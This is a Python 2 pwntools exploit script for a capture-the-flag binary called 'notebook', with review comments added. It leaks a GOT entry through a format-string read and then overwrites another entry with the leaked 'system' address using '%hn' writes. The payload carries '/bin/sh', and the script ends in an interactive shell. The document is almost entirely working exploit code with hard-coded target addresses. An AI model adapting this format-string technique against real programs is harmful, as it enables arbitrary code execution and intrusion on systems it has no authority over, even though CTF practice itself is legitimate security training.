CTF notebook

    # Flat pwntools harness (Python 2: `print` statements, `raw_input`).
    # `process`, `remote`, `context`, `gdb`, `p32`, `u32` are not defined here —
    # presumably brought in by `from pwn import *` earlier in the file; confirm.
    #
    # Feature switches (non-zero enables):
    #   Debug          pause on raw_input() and attach gdb (local only)
    #   Local          run Local_path as a child process instead of connecting to Remote_addr:Port
    #   Frida          attach a Frida script to the local process
    #   Debug_pwntools set pwntools log level to "debug"
    Debug=0  
    Local=1  
    Frida=0  
    Debug_pwntools=1  
     
    # constants
    Local_path='./notebook'
     
    # Remote-mode placeholders; unused while Local!=0.
    Remote_addr=''
    Port=1
     
    frida_script_path='./frida.js'
     
     
     
    if Local!=0:
      # NOTE(review): rebinding the name `process` shadows the pwntools `process()` helper
      # for the rest of the script; only the tube object is needed afterwards.
      process=process(Local_path)
    else:
      process=remote(Remote_addr,Port)
     
    if Debug_pwntools!=0:
      context.log_level="debug"
     
    if Frida!=0 and Local!=0:
      import frida,sys
     
      # Print one line from a Frida message payload.
      def print_result(message):  
                  print "[*] %s" %(message)
      
      # Frida message callback: forwards the 'payload' field to print_result.
      def on_message(message, data):  
                  print_result(message['payload'])
      
      
      frida_process = frida.attach(process.pid)
      # NOTE(review): this opens the literal file name 'frida_script_path',
      # not the variable frida_script_path defined above.
      f = open('frida_script_path')
      jscode = f.read()
      f.close()
      script = frida_process.create_script(jscode)  
      script.on('message', on_message)
      # NOTE(review): the script is created and its handler registered but never
      # loaded (frida's script.load()), so it does not run as written.
     
    if Debug!=0 and Local!=0:
      # Open gdb in a horizontal tmux split attached to the child.
      context.terminal = ['tmux', 'splitw', '-h']
      gdb.attach(process)
     
    if Debug!=0:
      # Pause so the debugger can be set up before any I/O.
      raw_input()
    # Fixed 32-bit addresses; presumably taken from the challenge binary — confirm.
    read_addr=0x0804A02C
    write_addr=0x0804A014
    globallength=0x0804A06C
    process.recv()
    process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+p32(globallength)+r"%26$n"+"\n")
    # process.send('a'*6+r"%25$s"+'a'*5+p32(read_addr)+"\n")
     
    # process.send("1\n")
    # Skip 6 bytes of echoed output, then read the 4-byte value that follows.
    process.recv(6)
    sys_got=u32(process.recv(4))
    # sys_got = strlen_got - (libc.got['strlen'] - libc.got['system'])
    # free_got = strlen_got - (libc.got['strlen'] - libc.got['free'])
    write_value=sys_got
    # print 'slen:'+hex(strlen_got)
    print 'sys :'+hex(write_value)
    # print 'free:'+hex(free_got)
    process.recv()
    # Split the 32-bit value into its upper and lower 16-bit halves.
    # `/` is Python 2 integer division here; under Python 3 it would yield a float.
    high_value=(write_value/(2**16))
    low_value=(write_value%(2**16))
    print hex(high_value)
    print hex(low_value)
    # Choose which half is sent first based on which value is larger.
    if high_value>low_value:
      print '先写低位'
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(low_value-0x10)+r'x'+r"%23$hn"+r'%'+str(high_value-low_value)+r'x'+r"%24$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%23$hn"+r'%'+r'x'+r"%24$hn"+"\n")
     
    else:
      # write the high half first
      process.send('/bin/sh'+chr(24)+p32(write_addr)+p32(write_addr+2)+r'%'+str(high_value-0x10)+r'x'+r"%24$hn"+r'%'+str(low_value-high_value)+r'x'+r"%23$hn"+"\n")
      # process.send('/bin/sh'+chr(61)+p32(write_addr)+p32(write_addr+2)+r'%'+r'x'+r"%24$hn"+r'%'+r'x'+r"%23$hn"+"\n")
     
    if Debug!=0:
      raw_input()
    # Hand the tube over to the user.
    process.interactive()
     

 
